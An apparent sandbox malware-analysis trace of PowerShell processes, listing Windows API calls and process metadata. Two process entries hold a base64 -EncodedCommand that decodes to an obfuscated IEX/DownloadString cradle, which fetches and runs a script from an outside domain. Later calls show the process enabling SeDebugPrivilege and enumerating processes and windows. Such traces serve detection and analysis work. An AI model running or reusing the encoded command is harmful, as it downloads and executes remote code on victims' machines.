	[0956.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0956.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0956.553] CoTaskMemAlloc (cb=0x104) returned 0x3015e0
	[0956.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3015e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0956.553] CoTaskMemFree (pv=0x3015e0) 
	[0956.556] CoTaskMemAlloc (cb=0x104) returned 0x3015e0
	[0956.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3015e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0956.556] CoTaskMemFree (pv=0x3015e0) 
	[0957.087] CoTaskMemAlloc (cb=0x104) returned 0x3015e0
	[0957.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3015e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.087] CoTaskMemFree (pv=0x3015e0) 
	[0957.088] CoTaskMemAlloc (cb=0x104) returned 0x3015e0
	[0957.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3015e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.088] CoTaskMemFree (pv=0x3015e0) 
	[0957.088] CoTaskMemAlloc (cb=0x104) returned 0x3015e0
	[0957.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3015e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.088] CoTaskMemFree (pv=0x3015e0) 
	[0957.645] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0957.645] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.645] CoTaskMemFree (pv=0x24c0b0) 
	[0957.648] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0957.648] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.648] CoTaskMemFree (pv=0x24c0b0) 
	[0959.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0959.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0967.712] CoTaskMemAlloc (cb=0x104) returned 0x259ae0
	[0967.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x259ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.712] CoTaskMemFree (pv=0x259ae0) 
	[0967.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0967.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0967.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0967.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0967.735] SetErrorMode (uMode=0x1) returned 0x1
	[0967.735] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcd880 | out: lpFileInformation=0xcd880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0967.735] SetErrorMode (uMode=0x1) returned 0x1

Thread:
	id = 523
	os_tid = 0x1310


Thread:
	id = 527
	os_tid = 0x1330


Thread:
	id = 1349
	os_tid = 0x1e98


Thread:
	id = 1354
	os_tid = 0x1ec0


Thread:
	id = 1435
	os_tid = 0x1b14


Thread:
	id = 1537
	os_tid = 0x203c


Thread:
	id = 1634
	os_tid = 0x2240


Thread:
	id = 1654
	os_tid = 0x2298

	[0829.470] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Process:
	id = "95"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x11339000"
	os_pid = "0x1228"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 492
	os_tid = 0x122c


Thread:
	id = 519
	os_tid = 0x12ec


Thread:
	id = 520
	os_tid = 0x12f8


Thread:
	id = 1726
	os_tid = 0x221c


Thread:
	id = 1732
	os_tid = 0x1fa8


Thread:
	id = 1744
	os_tid = 0xb9c


Thread:
	id = 1837
	os_tid = 0x242c


Process:
	id = "96"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6f247000"
	os_pid = "0x126c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 505
	os_tid = 0x1270

	[0526.338] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0530.433] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0530.433] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0530.433] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0530.433] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0541.860] GetVersionExW (in: lpVersionInformation=0x16da80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16da80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0541.862] GetVersionExW (in: lpVersionInformation=0x16da80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16da80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0542.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0542.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0542.782] GetVersionExW (in: lpVersionInformation=0x16d7f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16d7f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0542.782] SetErrorMode (uMode=0x1) returned 0x1
	[0542.783] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16d950 | out: lpFileInformation=0x16d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0542.784] SetErrorMode (uMode=0x1) returned 0x1
	[0542.788] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16dbc0 | out: lpdwHandle=0x16dbc0) returned 0x94c
	[0542.789] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bc72d8 | out: lpData=0x2bc72d8) returned 1
	[0542.794] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16db38, puLen=0x16db30 | out: lplpBuffer=0x16db38*=0x2bc7374, puLen=0x16db30) returned 1
	[0542.796] lstrlenW (lpString="䅁") returned 1
	[0542.805] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16daa8, puLen=0x16daa0 | out: lplpBuffer=0x16daa8*=0x2bc7450, puLen=0x16daa0) returned 1
	[0542.807] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0542.809] CoTaskMemAlloc (cb=0x2e) returned 0x2482e0
	[0542.809] lstrcpyW (in: lpString1=0x2482e0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0542.810] CoTaskMemFree (pv=0x2482e0) 
	[0542.810] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16daa8, puLen=0x16daa0 | out: lplpBuffer=0x16daa8*=0x2bc74a4, puLen=0x16daa0) returned 1
	[0542.810] lstrlenW (lpString="System.Management.Automation") returned 28
	[0542.810] CoTaskMemAlloc (cb=0x3c) returned 0x189860
	[0542.810] lstrcpyW (in: lpString1=0x189860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0542.810] CoTaskMemFree (pv=0x189860) 
	[0542.810] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16daa8, puLen=0x16daa0 | out: lplpBuffer=0x16daa8*=0x2bc7500, puLen=0x16daa0) returned 1
	[0542.810] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0542.810] CoTaskMemAlloc (cb=0x20) returned 0x246620
	[0542.810] lstrcpyW (in: lpString1=0x246620, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0542.810] CoTaskMemFree (pv=0x246620) 
	[0542.810] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16daa8, puLen=0x16daa0 | out: lplpBuffer=0x16daa8*=0x2bc7540, puLen=0x16daa0) returned 1
	[0542.811] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0542.811] CoTaskMemAlloc (cb=0x44) returned 0x189860
	[0542.811] lstrcpyW (in: lpString1=0x189860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0542.811] CoTaskMemFree (pv=0x189860) 
	[0542.811] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16daa8, puLen=0x16daa0 | out: lplpBuffer=0x16daa8*=0x2bc75a8, puLen=0x16daa0) returned 1
	[0542.811] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0542.811] CoTaskMemAlloc (cb=0x76) returned 0x1ef380
	[0542.811] lstrcpyW (in: lpString1=0x1ef380, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0542.811] CoTaskMemFree (pv=0x1ef380) 
	[0542.811] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16daa8, puLen=0x16daa0 | out: lplpBuffer=0x16daa8*=0x2bc7644, puLen=0x16daa0) returned 1
	[0542.811] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0542.811] CoTaskMemAlloc (cb=0x44) returned 0x189860
	[0542.811] lstrcpyW (in: lpString1=0x189860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0542.811] CoTaskMemFree (pv=0x189860) 
	[0542.811] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16daa8, puLen=0x16daa0 | out: lplpBuffer=0x16daa8*=0x2bc76a8, puLen=0x16daa0) returned 1
	[0542.811] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0542.811] CoTaskMemAlloc (cb=0x58) returned 0x1ae380
	[0542.811] lstrcpyW (in: lpString1=0x1ae380, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0542.811] CoTaskMemFree (pv=0x1ae380) 
	[0542.812] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16daa8, puLen=0x16daa0 | out: lplpBuffer=0x16daa8*=0x2bc7724, puLen=0x16daa0) returned 1
	[0542.812] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0542.812] CoTaskMemAlloc (cb=0x20) returned 0x246620
	[0542.812] lstrcpyW (in: lpString1=0x246620, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0542.812] CoTaskMemFree (pv=0x246620) 
	[0542.812] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16daa8, puLen=0x16daa0 | out: lplpBuffer=0x16daa8*=0x2bc73cc, puLen=0x16daa0) returned 1
	[0542.812] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0542.812] CoTaskMemAlloc (cb=0x66) returned 0x240eb0
	[0542.812] lstrcpyW (in: lpString1=0x240eb0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0542.812] CoTaskMemFree (pv=0x240eb0) 
	[0542.812] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16daa8, puLen=0x16daa0 | out: lplpBuffer=0x16daa8*=0x0, puLen=0x16daa0) returned 0
	[0542.812] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16daa8, puLen=0x16daa0 | out: lplpBuffer=0x16daa8*=0x0, puLen=0x16daa0) returned 0
	[0542.812] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16daa8, puLen=0x16daa0 | out: lplpBuffer=0x16daa8*=0x0, puLen=0x16daa0) returned 0
	[0542.812] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16da78, puLen=0x16da70 | out: lplpBuffer=0x16da78*=0x2bc7374, puLen=0x16da70) returned 1
	[0542.813] CoTaskMemAlloc (cb=0x204) returned 0x1f2100
	[0542.813] VerLanguageNameW (in: wLang=0x0, szLang=0x1f2100, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0542.815] CoTaskMemFree (pv=0x1f2100) 
	[0542.815] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\", lplpBuffer=0x16dac8, puLen=0x16dac0 | out: lplpBuffer=0x16dac8*=0x2bc7300, puLen=0x16dac0) returned 1
	[0542.820] GetCurrentProcessId () returned 0x126c
	[0543.805] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x16c9f0 | out: lpLuid=0x16c9f0*(LowPart=0x14, HighPart=0)) returned 1
	[0543.808] GetCurrentProcess () returned 0xffffffffffffffff
	[0543.808] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x16ca10 | out: TokenHandle=0x16ca10*=0x2e0) returned 1
	[0543.809] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2bcab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0543.810] CloseHandle (hObject=0x2e0) returned 1
	[0543.814] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x126c) returned 0x2e0
	[0543.823] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2bcabb8, cb=0x200, lpcbNeeded=0x16da28 | out: lphModule=0x2bcabb8, lpcbNeeded=0x16da28) returned 1
	[0543.825] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2bcae28, cb=0x18 | out: lpmodinfo=0x2bcae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0543.826] CoTaskMemAlloc (cb=0x804) returned 0x24ffd0
	[0543.826] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x24ffd0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0543.826] CoTaskMemFree (pv=0x24ffd0) 
	[0543.827] CoTaskMemAlloc (cb=0x804) returned 0x24ffd0
	[0543.827] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x24ffd0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0543.827] CoTaskMemFree (pv=0x24ffd0) 
	[0543.828] CloseHandle (hObject=0x2e0) returned 1
	[0545.005] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x126c) returned 0x2e0
	[0545.006] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x16db58 | out: lpExitCode=0x16db58*=0x103) returned 1
	[0545.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bcb088, Length=0x20000, ResultLength=0x16db20 | out: SystemInformation=0x12bcb088, ResultLength=0x16db20*=0x325e8) returned 0xc0000004
	[0545.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12beb0b8, Length=0x34de8, ResultLength=0x16db20 | out: SystemInformation=0x12beb0b8, ResultLength=0x16db20*=0x325e8) returned 0x0
	[0545.039] EnumWindows (lpEnumFunc=0x2b466ac, lParam=0x0) returned 1
	[0550.320] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.320] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x558
	[0550.320] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.321] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.321] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.321] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x538
	[0550.321] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.321] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x778
	[0550.321] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x778
	[0550.321] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.321] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.321] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.322] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.322] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.322] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.322] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.322] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.322] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x460
	[0550.322] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.322] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x4d0
	[0550.323] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x19a8
	[0550.323] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x16d880 | out: lpdwProcessId=0x16d880) returned 0x1944
